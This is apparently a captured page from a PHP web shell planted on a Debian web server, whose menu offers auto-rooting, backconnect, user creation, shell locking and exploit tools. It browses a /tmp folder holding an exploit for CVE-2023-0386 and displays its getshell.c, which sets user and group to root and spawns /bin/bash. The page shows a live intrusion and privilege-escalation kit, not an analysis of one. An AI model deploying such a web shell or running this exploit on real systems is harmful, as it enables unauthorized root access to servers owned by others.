Linux ip-172-26-5-244 6.1.0-28-cloud-amd64 #1 SMP PREEMPT_DYNAMIC Debian 6.1.119-1 (2024-11-22) x86_64
Apache
: 172.26.5.244 | : 216.73.216.21
Cant Read [ /etc/named.conf ]
8.3.14
daemon
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
tmp /
CVE-2023-0386-main /
[ HOME SHELL ]
Name
Size
Permission
Action
ovlcap
[ DIR ]
drwxr-xr-x
test
[ DIR ]
drwxr-xr-x
Makefile
150
B
-rw-r--r--
README.md
222
B
-rw-r--r--
exp.c
3.02
KB
-rw-r--r--
fuse.c
5.48
KB
-rw-r--r--
getshell.c
549
B
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : getshell.c
#define _GNU_SOURCE #include <stdio.h> #include <stdlib.h> #include <string.h> #include <unistd.h> #include <fcntl.h> #include <err.h> #include <errno.h> #include <sched.h> #include <sys/types.h> #include <sys/stat.h> #include <sys/wait.h> #include <sys/mount.h> int main(int argc, char const *argv[]) { int ret; ret = setuid(0); if (ret < 0) { perror("setuid"); return -1; } ret = setgid(0); if (ret < 0) { perror("setgid"); return -1; } system("/bin/bash"); return 0; }
Close